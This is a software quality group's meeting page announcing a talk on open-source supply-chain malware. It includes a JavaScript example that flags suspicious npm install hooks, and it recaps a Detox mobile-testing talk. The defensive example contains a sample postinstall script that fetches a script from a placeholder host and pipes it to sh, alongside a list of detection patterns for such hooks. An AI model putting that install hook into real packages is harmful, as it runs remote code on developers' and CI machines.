
Malware Security
Bryan Whyte, CISSP, Director, Solutions Engineering @ Sonatype
Wednesday June 17, 2025 6:30-8:00 PM - in person (free pizza!) or via Zoom (no pizza...)
Check in between 6:00 and 6:30 to network |
About the Presentation. . . Bryan Whyte breaks down the latest wave of open-source malware, explains how these threats diverge from traditional vulnerabilities, and shares actionable steps for organizations to defend mission-critical software. As organizations deepen their reliance on open-source software, evolving security threats are reshaping the landscape at an unprecedented pace. Threat actors are now increasingly targeting development pipelines and trusted ecosystems like npm to orchestrate supply chain attacks with significant downstream impact. Incidents such as the 2025 Shai-Hulud npm campaign, the XZ Utils backdoor, and the widespread compromise of over 23,000 GitHub repositories illustrate how open-source malware has quickly become a critical, top-tier threat built to evade legacy scanning and exploit trust woven into modern delivery pipelines.
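One concrete way the "malware, not vulnerability" distinction shows up in practice: a malicious npm package does not need anyone to call its code, because npm runs the package's install-time lifecycle scripts (preinstall, install, postinstall) automatically during `npm install`, and a freshly published package has no CVE for a vulnerability scanner to match. The following is an added example, not Sonatype tooling and not code from the talk. It audits package manifests for install hooks and applies a few hypothetical heuristic indicators; the three manifests are constructed for the demo and the indicator list is illustrative, not a complete signature set.

```javascript
// Added example (not Sonatype tooling or code from the talk): flag install-time
// lifecycle scripts in npm package manifests, the hook most open-source malware
// uses to run during `npm install` before any application code is ever called.
// The three manifests below are constructed for this demo.

// Scripts npm runs automatically during install.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Rough indicators that an install hook does more than compile a native addon.
// Hypothetical heuristics for illustration, not a complete malware signature set.
const SUSPICIOUS_PATTERNS = [
  /\bcurl\b/i,            // fetches a second stage
  /\bwget\b/i,
  /\bbase64\b/i,          // obfuscated payload
  /\beval\s*\(/i,
  /child_process/i,       // spawns a shell from a one-liner
  /\bnode\s+-e\b/i,       // inline JavaScript instead of a script file
  /\$\{?[A-Z_]*TOKEN/,    // reads a credential from the environment
];

// Constructed sample manifests (not real packages).
const SAMPLE_MANIFESTS = [
  { name: "native-addon", version: "2.1.0",
    scripts: { install: "node-gyp rebuild", test: "mocha" } },
  { name: "colorful-logger", version: "1.4.2",
    scripts: { postinstall:
      "node -e \"require('child_process').exec('curl -s https://example.invalid/x | sh')\"" } },
  { name: "plain-lib", version: "0.3.0", scripts: { test: "jest" } },
];

// Returns one finding per install hook present in the manifest.
function auditManifest(manifest) {
  const scripts = manifest.scripts || {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === "string")
    .map((hook) => {
      const cmd = scripts[hook];
      const indicators = SUSPICIOUS_PATTERNS
        .filter((re) => re.test(cmd))
        .map((re) => re.source);
      return {
        pkg: `${manifest.name}@${manifest.version}`,
        hook,
        cmd,
        indicators,
        suspicious: indicators.length > 0,
      };
    });
}

// Audit a whole dependency set (for example every node_modules/*/package.json).
function auditAll(manifests) {
  return manifests.flatMap(auditManifest);
}

// Packages whose install hooks hit at least one indicator. Hooks with no hits
// still deserve a look: any install-time script is code that runs unasked.
function suspiciousPackages(manifests) {
  return auditAll(manifests).filter((f) => f.suspicious).map((f) => f.pkg);
}

for (const f of auditAll(SAMPLE_MANIFESTS)) {
  console.log(`${f.suspicious ? "SUSPICIOUS" : "review    "} ${f.pkg} ${f.hook}: ${f.cmd}`);
}
```

A heuristic like this is a triage aid, not a control. The blanket control is to stop running install hooks at all: set `ignore-scripts=true` in the project's .npmrc (or run `npm ci --ignore-scripts`) and rebuild the handful of native dependencies that genuinely need a build step explicitly, so that a newly compromised version of a trusted package cannot execute on a developer laptop or CI runner the moment it is installed.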
About the Speaker. . .
After spending 20 years in software development, Bryan started his journey into Application Security in 2015 with the AppScan tool suite for Static, Dynamic and Mobile Application Security Testing. In 2018, he expanded his Cybersecurity proficiency, earning the Certified Information Systems Security Professional (CISSP). In 2019, he was excited to join Sonatype due to the explosive growth of open-source software, which has made Software Composition Analysis (SCA) a critical aspect of Application Security.
May's Presentation . . See also the recording of May's well-received presentation by T.J. Maher, Building a React Native Mobile Automated Test Framework, in the www.SQGNE.org Calendar.

In the past ten years, mobile web traffic has doubled over desktop browser traffic. To improve the user experience in the mobile environment, developers create native apps designed and optimized for a particular device type. Not surprisingly, mobile native app testing requires a specialized knowledge base and has its own testing requirements, the topic of TJ Maher's "Building a React Native Mobile Automated Test Framework," presented at SQGNE's monthly meeting. TJ brought enthusiasm, authoritative knowledge, and 10 years' experience as an SDET to the group in an informative, comprehensive overview of the software test life cycle for the mobile app ecosystem: from an overview of React Native mobile apps, through test development, to executing tests from the command line and in a CI/CD GitHub Action.

Because of the inherent volatility of the mobile environment, tooling used to test applications in the desktop/web browser environment is not well suited to mobile app testing. In 2016, Wix developed the tool TJ discussed, Detox, with which he has built automation test frameworks for native mobile apps. TJ took us through steps A through Z in constructing an automated test framework using Detox and TypeScript. Detox, an open-source product with two flavors, EarlGrey (iOS) and Espresso (Android), creates a special build of the application under test so that it can monitor the app and synchronize with it. This synchronization eliminates the flakiness, and the resulting test failures, caused by the tests themselves: the tests run only when the app is idle and ready. All automation engineers will appreciate this benefit after spending too much time chasing the causes of test flakiness and timing issues.

TJ's Detox demo included a test that validates the user name and password on a login page. The framework was composed of test code, configuration, and page objects. Other features included logging, pre-test scripts, and reports. TJ's presentation concluded with running the test in a GitHub CI/CD pipeline as a GitHub Action.
Grateful thanks to sponsors Microsoft and mabl for making SQGNE possible. Please let us know of any additional prospective sponsors.
Link to SQGNE Community Links Page
May 2025